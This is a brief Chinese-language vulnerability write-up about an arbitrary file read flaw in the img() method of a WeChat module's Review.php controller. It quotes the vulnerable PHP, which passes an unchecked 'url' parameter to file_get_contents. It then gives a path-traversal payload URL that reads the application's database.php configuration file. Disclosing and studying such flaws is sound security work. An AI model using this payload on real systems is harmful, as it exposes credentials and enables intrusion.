任意文件读取

漏洞文件 application\wechat\controller\Review.php

1
2
3
4
5
6
7
8
9
10
public function img()
   {
       $url = $this->request->get('url', '');
       $filename = FileService::getFileName($url, 'jpg', 'tmp/');
       if (false === ($img = FileService::getFileUrl($filename))) {
           $info = FileService::save($filename, file_get_contents($url));
           $img = (is_array($info) && isset($info['url'])) ? $info['url'] : $url;
       }
       $this->redirect($img);
   }

Payload:

https://www.xxxx.com/wechat/Review/img?url=../application/database.php